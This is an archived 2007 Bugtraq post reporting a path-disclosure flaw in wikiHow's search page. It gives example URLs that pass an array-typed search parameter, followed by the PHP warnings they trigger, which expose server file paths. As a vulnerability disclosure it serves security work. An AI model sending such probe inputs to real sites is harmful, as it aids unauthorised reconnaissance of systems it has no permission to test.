lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 20 Jan 2007 23:02:19 -0000
From: iamtheevil1@...il.com
To: bugtraq@...urityfocus.com
Subject: Wiki-how path disclosure

The search function of wikihow is vulnerable to path disclose when an array type is givin as a search parameter. 

Example: http://www.wikihow.com/Special:LSearch?search[]=pie&fulltext=Search
yields:
Warning: urlencode() expects parameter 1 to be string, array given in /var/www/html/wiki16/includes/SpecialLSearch.php on line 56

Warning: Illegal offset type in isset or empty in /var/www/html/wiki16/includes/Title.php on line 123

Warning: Illegal offset type in /var/www/html/wiki16/includes/Title.php on line 146

Warning: urlencode() expects parameter 1 to be string, array given in /var/www/html/wiki16/includes/SpecialLSearch.php on line 124

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /var/www/html/wiki16/skins/WikiHowSkin.php on line 1468

Also, when an array is given as a search type, the function Fatal error: Call to a member function getArticleID() yields another path disclose as seen here: http://www.wikihow.com/Special:LSearch?search=%5B%5D&fulltext=Search

Fatal error: Call to a member function getArticleID() on a non-object in /var/www/html/wiki16/includes/SpecialLSearch.php on line 91

It is not known at this time if other wiki systems are vulnerable to the same thing. If it is, drop me a line.

Powered by blists - more mailing lists